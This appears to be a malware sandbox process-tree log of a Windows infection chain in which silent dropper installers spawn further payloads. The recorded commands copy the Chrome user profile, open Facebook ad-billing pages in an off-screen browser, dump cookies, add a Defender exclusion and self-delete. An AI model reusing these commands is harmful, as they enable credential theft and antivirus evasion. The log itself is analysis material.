C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/65⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2066⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1944 /prefetch:866⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1932 /prefetch:866⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1884 /prefetch:266⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:166⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:166⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:166⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:166⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:166⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,754814614428910174,7785327914711144119,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:166⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\txw2edru.mlp\customer4.exe & exit63⤵
-
C:\Users\Admin\AppData\Local\Temp\txw2edru.mlp\customer4.exeC:\Users\Admin\AppData\Local\Temp\txw2edru.mlp\customer4.exe64⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"65⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kmnjuqrb.f34\GcleanerWW.exe /mixone & exit63⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2dcae15q.vb0\privacytools5.exe & exit63⤵
-
C:\Users\Admin\AppData\Local\Temp\2dcae15q.vb0\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2dcae15q.vb0\privacytools5.exe64⤵
-
C:\Users\Admin\AppData\Local\Temp\2dcae15q.vb0\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2dcae15q.vb0\privacytools5.exe65⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3lk3rrrx.chq\setup.exe /8-2222 & exit63⤵
-
C:\Users\Admin\AppData\Local\Temp\3lk3rrrx.chq\setup.exeC:\Users\Admin\AppData\Local\Temp\3lk3rrrx.chq\setup.exe /8-222264⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Green-Sound"65⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iz3xkszw.bpb\MultitimerFour.exe & exit63⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Delta.exe" /Verysilent57⤵
-
C:\Users\Admin\AppData\Local\Temp\is-F8SDD.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-F8SDD.tmp\Delta.tmp" /SL5="$B0710,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Delta.exe" /Verysilent58⤵
-
C:\Users\Admin\AppData\Local\Temp\is-60MJ7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-60MJ7.tmp\Setup.exe" /VERYSILENT59⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-60MJ7.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit60⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f61⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\zznote.exe" /Verysilent57⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0BBJ1.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-0BBJ1.tmp\zznote.tmp" /SL5="$C0710,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\zznote.exe" /Verysilent58⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JFDFV.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-JFDFV.tmp\jg4_4jaa.exe" /silent59⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\hjjgaa.exe" /Verysilent57⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt58⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt58⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zgeanh03lkp\z15edp14lnx.exe"C:\Users\Admin\AppData\Local\Temp\zgeanh03lkp\z15edp14lnx.exe" /ustwo INSTALL53⤵
-
-
C:\Users\Admin\AppData\Local\Temp\zcasclwycyl\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\zcasclwycyl\askinstall24.exe"53⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe54⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe55⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y54⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/54⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf0,0xf4,0xf8,0xcc,0xfc,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2055⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1824 /prefetch:855⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1560 /prefetch:255⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2220 /prefetch:855⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:155⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:155⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:155⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:155⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:155⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:155⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:155⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:155⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:155⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:155⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:155⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,15536530656500969818,14711157873758094616,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:155⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rwwlzomj105\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\rwwlzomj105\chashepro3.exe" /VERYSILENT53⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8UQKK.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-8UQKK.tmp\chashepro3.tmp" /SL5="$D05A4,1478410,58368,C:\Users\Admin\AppData\Local\Temp\rwwlzomj105\chashepro3.exe" /VERYSILENT54⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Delta.exe" /Verysilent42⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SQ45M.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-SQ45M.tmp\Delta.tmp" /SL5="$50708,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Delta.exe" /Verysilent43⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IHQ37.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IHQ37.tmp\Setup.exe" /VERYSILENT44⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\zznote.exe" /Verysilent42⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2BMG1.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-2BMG1.tmp\zznote.tmp" /SL5="$70676,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\zznote.exe" /Verysilent43⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CEI2M.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-CEI2M.tmp\jg4_4jaa.exe" /silent44⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\hjjgaa.exe" /Verysilent42⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt43⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt43⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1lcdyb10qam\ja3fs0xkt1y.exe"C:\Users\Admin\AppData\Local\Temp\1lcdyb10qam\ja3fs0xkt1y.exe" /ustwo INSTALL38⤵
-
-
C:\Users\Admin\AppData\Local\Temp\ibi5hqoc1vx\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\ibi5hqoc1vx\chashepro3.exe" /VERYSILENT38⤵
-
C:\Users\Admin\AppData\Local\Temp\is-5T2TA.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-5T2TA.tmp\chashepro3.tmp" /SL5="$70630,1478410,58368,C:\Users\Admin\AppData\Local\Temp\ibi5hqoc1vx\chashepro3.exe" /VERYSILENT39⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Delta.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-V9C29.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-V9C29.tmp\Delta.tmp" /SL5="$3068A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Delta.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-53IRO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-53IRO.tmp\Setup.exe" /VERYSILENT29⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-53IRO.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit30⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f31⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 631⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\zznote.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GBIF1.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-GBIF1.tmp\zznote.tmp" /SL5="$4068A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\zznote.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-H9C79.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-H9C79.tmp\jg4_4jaa.exe" /silent29⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\hjjgaa.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2nc2w3105lb\na1bwr4hdpx.exe"C:\Users\Admin\AppData\Local\Temp\2nc2w3105lb\na1bwr4hdpx.exe" /ustwo INSTALL23⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 65224⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 66424⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 66824⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 68424⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 88824⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 93224⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 119224⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 115624⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 130824⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 130024⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\2u4pfftsl3p\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\2u4pfftsl3p\askinstall24.exe"23⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y24⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2025⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2172 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1676 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:225⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:125⤵
-
-
